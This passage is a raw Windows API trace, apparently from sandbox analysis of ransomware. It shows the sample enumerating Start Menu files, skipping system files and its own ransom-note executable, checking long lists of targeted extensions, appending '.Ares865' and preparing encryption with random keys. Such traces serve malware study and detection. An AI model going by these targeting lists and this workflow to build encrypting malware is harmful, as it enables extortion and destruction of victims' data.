returned 3 [0067.070] lstrcmpiW (lpString1="lnk", lpString2="sis") returned -1 [0067.070] lstrlenW (lpString="spq") returned 3 [0067.070] lstrcmpiW (lpString1="lnk", lpString2="spq") returned -1 [0067.070] lstrlenW (lpString="te") returned 2 [0067.070] lstrcmpiW (lpString1="nk", lpString2="te") returned -1 [0067.070] lstrlenW (lpString="teacher") returned 7 [0067.070] lstrcmpiW (lpString1="ter.lnk", lpString2="teacher") returned 1 [0067.070] lstrlenW (lpString="tmd") returned 3 [0067.070] lstrcmpiW (lpString1="lnk", lpString2="tmd") returned -1 [0067.070] lstrlenW (lpString="tps") returned 3 [0067.070] lstrcmpiW (lpString1="lnk", lpString2="tps") returned -1 [0067.070] lstrlenW (lpString="trc") returned 3 [0067.070] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0067.070] lstrlenW (lpString="trc") returned 3 [0067.070] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0067.070] lstrlenW (lpString="trm") returned 3 [0067.070] lstrcmpiW (lpString1="lnk", lpString2="trm") returned -1 [0067.070] lstrlenW (lpString="udb") returned 3 [0067.070] lstrcmpiW (lpString1="lnk", lpString2="udb") returned -1 [0067.070] lstrlenW (lpString="udl") returned 3 [0067.070] lstrcmpiW (lpString1="lnk", lpString2="udl") returned -1 [0067.070] lstrlenW (lpString="usr") returned 3 [0067.070] lstrcmpiW (lpString1="lnk", lpString2="usr") returned -1 [0067.070] lstrlenW (lpString="v12") returned 3 [0067.071] lstrcmpiW (lpString1="lnk", lpString2="v12") returned -1 [0067.071] lstrlenW (lpString="vis") returned 3 [0067.071] lstrcmpiW (lpString1="lnk", lpString2="vis") returned -1 [0067.071] lstrlenW (lpString="vpd") returned 3 [0067.071] lstrcmpiW (lpString1="lnk", lpString2="vpd") returned -1 [0067.071] lstrlenW (lpString="vvv") returned 3 [0067.071] lstrcmpiW (lpString1="lnk", lpString2="vvv") returned -1 [0067.071] lstrlenW (lpString="wdb") returned 3 [0067.071] lstrcmpiW (lpString1="lnk", lpString2="wdb") returned -1 [0067.071] lstrlenW (lpString="wmdb") returned 4 [0067.071] lstrcmpiW (lpString1=".lnk", lpString2="wmdb") returned -1 [0067.071] lstrlenW (lpString="wrk") returned 3 [0067.071] lstrcmpiW (lpString1="lnk", lpString2="wrk") returned -1 [0067.071] lstrlenW (lpString="xdb") returned 3 [0067.071] lstrcmpiW (lpString1="lnk", lpString2="xdb") returned -1 [0067.071] lstrlenW (lpString="xld") returned 3 [0067.071] lstrcmpiW (lpString1="lnk", lpString2="xld") returned -1 [0067.071] lstrlenW (lpString="xmlff") returned 5 [0067.071] lstrcmpiW (lpString1="r.lnk", lpString2="xmlff") returned -1 [0067.071] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Maintenance\\Backup and Restore Center.lnk.Ares865") returned 88 [0067.071] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Maintenance\\Backup and Restore Center.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\maintenance\\backup and restore center.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Maintenance\\Backup and Restore Center.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\maintenance\\backup and restore center.lnk.ares865"), dwFlags=0x1) returned 1 [0067.073] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Maintenance\\Backup and Restore Center.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\maintenance\\backup and restore center.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0067.073] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1304) returned 1 [0067.073] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0067.073] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0067.073] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0067.073] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0067.074] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0067.074] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.074] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x820, lpName=0x0) returned 0x120 [0067.076] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x820) returned 0x190000 [0067.076] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0067.077] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0067.077] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.077] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0067.077] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0067.077] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0067.077] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0067.077] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0067.077] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0067.077] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0067.078] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0067.078] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0067.078] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0067.078] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0067.078] CloseHandle (hObject=0x120) returned 1 [0067.078] CloseHandle (hObject=0x12c) returned 1 [0067.078] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0067.078] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0067.078] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0067.078] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89a77447, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x89a77447, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x89a77447, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x4e0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Create Recovery Disc.lnk", cAlternateFileName="CREATE~1.LNK")) returned 1 [0067.078] lstrcmpiW (lpString1="Create Recovery Disc.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.078] lstrcmpiW (lpString1="Create Recovery Disc.lnk", lpString2="aoldtz.exe") returned 1 [0067.078] lstrcmpiW (lpString1="Create Recovery Disc.lnk", lpString2=".") returned 1 [0067.078] lstrcmpiW (lpString1="Create Recovery Disc.lnk", lpString2="..") returned 1 [0067.078] lstrcmpiW (lpString1="Create Recovery Disc.lnk", lpString2="windows") returned -1 [0067.078] lstrcmpiW (lpString1="Create Recovery Disc.lnk", lpString2="bootmgr") returned 1 [0067.078] lstrcmpiW (lpString1="Create Recovery Disc.lnk", lpString2="temp") returned -1 [0067.078] lstrcmpiW (lpString1="Create Recovery Disc.lnk", lpString2="pagefile.sys") returned -1 [0067.078] lstrcmpiW (lpString1="Create Recovery Disc.lnk", lpString2="boot") returned 1 [0067.079] lstrcmpiW (lpString1="Create Recovery Disc.lnk", lpString2="ids.txt") returned -1 [0067.079] lstrcmpiW (lpString1="Create Recovery Disc.lnk", lpString2="ntuser.dat") returned -1 [0067.079] lstrcmpiW (lpString1="Create Recovery Disc.lnk", lpString2="perflogs") returned -1 [0067.079] lstrcmpiW (lpString1="Create Recovery Disc.lnk", lpString2="MSBuild") returned -1 [0067.079] lstrlenW (lpString="Create Recovery Disc.lnk") returned 24 [0067.079] lstrlenW (lpString="C:\\Users\\All Users\\Start Menu\\Programs\\Maintenance\\Backup and Restore Center.lnk") returned 80 [0067.079] lstrcpyW (in: lpString1=0x2cce466, lpString2="Create Recovery Disc.lnk" | out: lpString1="Create Recovery Disc.lnk") returned="Create Recovery Disc.lnk" [0067.079] lstrlenW (lpString="Create Recovery Disc.lnk") returned 24 [0067.079] lstrlenW (lpString="Ares865") returned 7 [0067.079] lstrcmpiW (lpString1="isc.lnk", lpString2="Ares865") returned 1 [0067.079] lstrlenW (lpString=".dll") returned 4 [0067.079] lstrcmpiW (lpString1="Create Recovery Disc.lnk", lpString2=".dll") returned 1 [0067.079] lstrlenW (lpString=".lnk") returned 4 [0067.079] lstrcmpiW (lpString1="Create Recovery Disc.lnk", lpString2=".lnk") returned 1 [0067.079] lstrlenW (lpString=".ini") returned 4 [0067.079] lstrcmpiW (lpString1="Create Recovery Disc.lnk", lpString2=".ini") returned 1 [0067.079] lstrlenW (lpString=".sys") returned 4 [0067.079] lstrcmpiW (lpString1="Create Recovery Disc.lnk", lpString2=".sys") returned 1 [0067.079] lstrlenW (lpString="Create Recovery Disc.lnk") returned 24 [0067.079] lstrlenW (lpString="bak") returned 3 [0067.079] lstrcmpiW (lpString1="lnk", lpString2="bak") returned 1 [0067.079] lstrlenW (lpString="ba_") returned 3 [0067.079] lstrcmpiW (lpString1="lnk", lpString2="ba_") returned 1 [0067.079] lstrlenW (lpString="dbb") returned 3 [0067.079] lstrcmpiW (lpString1="lnk", lpString2="dbb") returned 1 [0067.079] lstrlenW (lpString="vmdk") returned 4 [0067.079] lstrcmpiW (lpString1=".lnk", lpString2="vmdk") returned -1 [0067.079] lstrlenW (lpString="rar") returned 3 [0067.079] lstrcmpiW (lpString1="lnk", lpString2="rar") returned -1 [0067.079] lstrlenW (lpString="zip") returned 3 [0067.079] lstrcmpiW (lpString1="lnk", lpString2="zip") returned -1 [0067.079] lstrlenW (lpString="tgz") returned 3 [0067.079] lstrcmpiW (lpString1="lnk", lpString2="tgz") returned -1 [0067.079] lstrlenW (lpString="vbox") returned 4 [0067.079] lstrcmpiW (lpString1=".lnk", lpString2="vbox") returned -1 [0067.079] lstrlenW (lpString="vdi") returned 3 [0067.079] lstrcmpiW (lpString1="lnk", lpString2="vdi") returned -1 [0067.080] lstrlenW (lpString="vhd") returned 3 [0067.080] lstrcmpiW (lpString1="lnk", lpString2="vhd") returned -1 [0067.080] lstrlenW (lpString="vhdx") returned 4 [0067.080] lstrcmpiW (lpString1=".lnk", lpString2="vhdx") returned -1 [0067.080] lstrlenW (lpString="avhd") returned 4 [0067.080] lstrcmpiW (lpString1=".lnk", lpString2="avhd") returned -1 [0067.080] lstrlenW (lpString="db") returned 2 [0067.080] lstrcmpiW (lpString1="nk", lpString2="db") returned 1 [0067.080] lstrlenW (lpString="db2") returned 3 [0067.080] lstrcmpiW (lpString1="lnk", lpString2="db2") returned 1 [0067.080] lstrlenW (lpString="db3") returned 3 [0067.080] lstrcmpiW (lpString1="lnk", lpString2="db3") returned 1 [0067.080] lstrlenW (lpString="dbf") returned 3 [0067.080] lstrcmpiW (lpString1="lnk", lpString2="dbf") returned 1 [0067.080] lstrlenW (lpString="mdf") returned 3 [0067.080] lstrcmpiW (lpString1="lnk", lpString2="mdf") returned -1 [0067.080] lstrlenW (lpString="mdb") returned 3 [0067.080] lstrcmpiW (lpString1="lnk", lpString2="mdb") returned -1 [0067.080] lstrlenW (lpString="sql") returned 3 [0067.080] lstrcmpiW (lpString1="lnk", lpString2="sql") returned -1 [0067.080] lstrlenW (lpString="sqlite") returned 6 [0067.080] lstrcmpiW (lpString1="sc.lnk", lpString2="sqlite") returned -1 [0067.080] lstrlenW (lpString="sqlite3") returned 7 [0067.080] lstrcmpiW (lpString1="isc.lnk", lpString2="sqlite3") returned -1 [0067.080] lstrlenW (lpString="sqlitedb") returned 8 [0067.080] lstrcmpiW (lpString1="Disc.lnk", lpString2="sqlitedb") returned -1 [0067.080] lstrlenW (lpString="xml") returned 3 [0067.080] lstrcmpiW (lpString1="lnk", lpString2="xml") returned -1 [0067.080] lstrlenW (lpString="$er") returned 3 [0067.080] lstrcmpiW (lpString1="lnk", lpString2="$er") returned 1 [0067.080] lstrlenW (lpString="4dd") returned 3 [0067.080] lstrcmpiW (lpString1="lnk", lpString2="4dd") returned 1 [0067.080] lstrlenW (lpString="4dl") returned 3 [0067.080] lstrcmpiW (lpString1="lnk", lpString2="4dl") returned 1 [0067.080] lstrlenW (lpString="^^^") returned 3 [0067.080] lstrcmpiW (lpString1="lnk", lpString2="^^^") returned 1 [0067.080] lstrlenW (lpString="abs") returned 3 [0067.080] lstrcmpiW (lpString1="lnk", lpString2="abs") returned 1 [0067.081] lstrlenW (lpString="abx") returned 3 [0067.081] lstrcmpiW (lpString1="lnk", lpString2="abx") returned 1 [0067.081] lstrlenW (lpString="accdb") returned 5 [0067.081] lstrcmpiW (lpString1="c.lnk", lpString2="accdb") returned 1 [0067.081] lstrlenW (lpString="accdc") returned 5 [0067.081] lstrcmpiW (lpString1="c.lnk", lpString2="accdc") returned 1 [0067.081] lstrlenW (lpString="accde") returned 5 [0067.081] lstrcmpiW (lpString1="c.lnk", lpString2="accde") returned 1 [0067.081] lstrlenW (lpString="accdr") returned 5 [0067.081] lstrcmpiW (lpString1="c.lnk", lpString2="accdr") returned 1 [0067.081] lstrlenW (lpString="accdt") returned 5 [0067.081] lstrcmpiW (lpString1="c.lnk", lpString2="accdt") returned 1 [0067.081] lstrlenW (lpString="accdw") returned 5 [0067.081] lstrcmpiW (lpString1="c.lnk", lpString2="accdw") returned 1 [0067.081] lstrlenW (lpString="accft") returned 5 [0067.081] lstrcmpiW (lpString1="c.lnk", lpString2="accft") returned 1 [0067.081] lstrlenW (lpString="adb") returned 3 [0067.081] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0067.081] lstrlenW (lpString="adb") returned 3 [0067.081] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0067.081] lstrlenW (lpString="ade") returned 3 [0067.081] lstrcmpiW (lpString1="lnk", lpString2="ade") returned 1 [0067.081] lstrlenW (lpString="adf") returned 3 [0067.081] lstrcmpiW (lpString1="lnk", lpString2="adf") returned 1 [0067.081] lstrlenW (lpString="adn") returned 3 [0067.081] lstrcmpiW (lpString1="lnk", lpString2="adn") returned 1 [0067.081] lstrlenW (lpString="adp") returned 3 [0067.081] lstrcmpiW (lpString1="lnk", lpString2="adp") returned 1 [0067.081] lstrlenW (lpString="alf") returned 3 [0067.081] lstrcmpiW (lpString1="lnk", lpString2="alf") returned 1 [0067.081] lstrlenW (lpString="ask") returned 3 [0067.081] lstrcmpiW (lpString1="lnk", lpString2="ask") returned 1 [0067.081] lstrlenW (lpString="btr") returned 3 [0067.081] lstrcmpiW (lpString1="lnk", lpString2="btr") returned 1 [0067.081] lstrlenW (lpString="cat") returned 3 [0067.081] lstrcmpiW (lpString1="lnk", lpString2="cat") returned 1 [0067.081] lstrlenW (lpString="cdb") returned 3 [0067.081] lstrcmpiW (lpString1="lnk", lpString2="cdb") returned 1 [0067.082] lstrlenW (lpString="ckp") returned 3 [0067.082] lstrcmpiW (lpString1="lnk", lpString2="ckp") returned 1 [0067.082] lstrlenW (lpString="cma") returned 3 [0067.082] lstrcmpiW (lpString1="lnk", lpString2="cma") returned 1 [0067.082] lstrlenW (lpString="cpd") returned 3 [0067.082] lstrcmpiW (lpString1="lnk", lpString2="cpd") returned 1 [0067.082] lstrlenW (lpString="dacpac") returned 6 [0067.082] lstrcmpiW (lpString1="sc.lnk", lpString2="dacpac") returned 1 [0067.082] lstrlenW (lpString="dad") returned 3 [0067.082] lstrcmpiW (lpString1="lnk", lpString2="dad") returned 1 [0067.082] lstrlenW (lpString="dadiagrams") returned 10 [0067.082] lstrcmpiW (lpString1="y Disc.lnk", lpString2="dadiagrams") returned 1 [0067.082] lstrlenW (lpString="daschema") returned 8 [0067.082] lstrcmpiW (lpString1="Disc.lnk", lpString2="daschema") returned 1 [0067.082] lstrlenW (lpString="db-journal") returned 10 [0067.082] lstrcmpiW (lpString1="y Disc.lnk", lpString2="db-journal") returned 1 [0067.082] lstrlenW (lpString="db-shm") returned 6 [0067.082] lstrcmpiW (lpString1="sc.lnk", lpString2="db-shm") returned 1 [0067.082] lstrlenW (lpString="db-wal") returned 6 [0067.082] lstrcmpiW (lpString1="sc.lnk", lpString2="db-wal") returned 1 [0067.082] lstrlenW (lpString="dbc") returned 3 [0067.082] lstrcmpiW (lpString1="lnk", lpString2="dbc") returned 1 [0067.082] lstrlenW (lpString="dbs") returned 3 [0067.082] lstrcmpiW (lpString1="lnk", lpString2="dbs") returned 1 [0067.082] lstrlenW (lpString="dbt") returned 3 [0067.082] lstrcmpiW (lpString1="lnk", lpString2="dbt") returned 1 [0067.082] lstrlenW (lpString="dbv") returned 3 [0067.082] lstrcmpiW (lpString1="lnk", lpString2="dbv") returned 1 [0067.082] lstrlenW (lpString="dbx") returned 3 [0067.082] lstrcmpiW (lpString1="lnk", lpString2="dbx") returned 1 [0067.082] lstrlenW (lpString="dcb") returned 3 [0067.082] lstrcmpiW (lpString1="lnk", lpString2="dcb") returned 1 [0067.083] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Maintenance\\Create Recovery Disc.lnk.Ares865") returned 83 [0067.083] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Maintenance\\Create Recovery Disc.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\maintenance\\create recovery disc.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Maintenance\\Create Recovery Disc.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\maintenance\\create recovery disc.lnk.ares865"), dwFlags=0x1) returned 1 [0067.084] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Maintenance\\Create Recovery Disc.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\maintenance\\create recovery disc.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0067.084] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1248) returned 1 [0067.084] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0067.084] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0067.084] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0067.084] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0067.085] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0067.085] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.085] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7e0, lpName=0x0) returned 0x120 [0067.087] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7e0) returned 0x190000 [0067.087] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0067.088] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0067.088] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.088] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0067.088] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0067.088] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0067.088] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0067.088] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0067.088] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0067.088] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9710 [0067.089] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0067.089] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9710 | out: hHeap=0x2b0000) returned 1 [0067.089] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0067.089] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0067.089] CloseHandle (hObject=0x120) returned 1 [0067.089] CloseHandle (hObject=0x12c) returned 1 [0067.089] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0067.089] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0067.089] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0067.089] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xec13fc0c, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xec13fc0c, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x8ab6d126, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x25e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop.ini", cAlternateFileName="")) returned 1 [0067.089] lstrcmpiW (lpString1="Desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.089] lstrcmpiW (lpString1="Desktop.ini", lpString2="aoldtz.exe") returned 1 [0067.089] lstrcmpiW (lpString1="Desktop.ini", lpString2=".") returned 1 [0067.089] lstrcmpiW (lpString1="Desktop.ini", lpString2="..") returned 1 [0067.089] lstrcmpiW (lpString1="Desktop.ini", lpString2="windows") returned -1 [0067.089] lstrcmpiW (lpString1="Desktop.ini", lpString2="bootmgr") returned 1 [0067.089] lstrcmpiW (lpString1="Desktop.ini", lpString2="temp") returned -1 [0067.089] lstrcmpiW (lpString1="Desktop.ini", lpString2="pagefile.sys") returned -1 [0067.090] lstrcmpiW (lpString1="Desktop.ini", lpString2="boot") returned 1 [0067.090] lstrcmpiW (lpString1="Desktop.ini", lpString2="ids.txt") returned -1 [0067.090] lstrcmpiW (lpString1="Desktop.ini", lpString2="ntuser.dat") returned -1 [0067.090] lstrcmpiW (lpString1="Desktop.ini", lpString2="perflogs") returned -1 [0067.090] lstrcmpiW (lpString1="Desktop.ini", lpString2="MSBuild") returned -1 [0067.090] lstrlenW (lpString="Desktop.ini") returned 11 [0067.090] lstrlenW (lpString="C:\\Users\\All Users\\Start Menu\\Programs\\Maintenance\\Create Recovery Disc.lnk") returned 75 [0067.090] lstrcpyW (in: lpString1=0x2cce466, lpString2="Desktop.ini" | out: lpString1="Desktop.ini") returned="Desktop.ini" [0067.090] lstrlenW (lpString="Desktop.ini") returned 11 [0067.090] lstrlenW (lpString="Ares865") returned 7 [0067.090] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0067.090] lstrlenW (lpString=".dll") returned 4 [0067.090] lstrcmpiW (lpString1="Desktop.ini", lpString2=".dll") returned 1 [0067.090] lstrlenW (lpString=".lnk") returned 4 [0067.090] lstrcmpiW (lpString1="Desktop.ini", lpString2=".lnk") returned 1 [0067.090] lstrlenW (lpString=".ini") returned 4 [0067.090] lstrcmpiW (lpString1="Desktop.ini", lpString2=".ini") returned 1 [0067.090] lstrlenW (lpString=".sys") returned 4 [0067.090] lstrcmpiW (lpString1="Desktop.ini", lpString2=".sys") returned 1 [0067.090] lstrlenW (lpString="Desktop.ini") returned 11 [0067.090] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Maintenance\\Desktop.ini.Ares865") returned 70 [0067.090] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Maintenance\\Desktop.ini" (normalized: "c:\\users\\all users\\start menu\\programs\\maintenance\\desktop.ini"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Maintenance\\Desktop.ini.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\maintenance\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0067.091] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Maintenance\\Desktop.ini.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\maintenance\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0067.091] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=606) returned 1 [0067.091] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0067.092] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0067.092] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0067.092] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0067.092] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0067.093] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.093] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x560, lpName=0x0) returned 0x120 [0067.094] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x560) returned 0x190000 [0067.094] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0067.095] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0067.095] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.095] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0067.095] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0067.095] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0067.095] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0067.095] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0067.095] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0067.095] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0067.095] HeapFree (in: 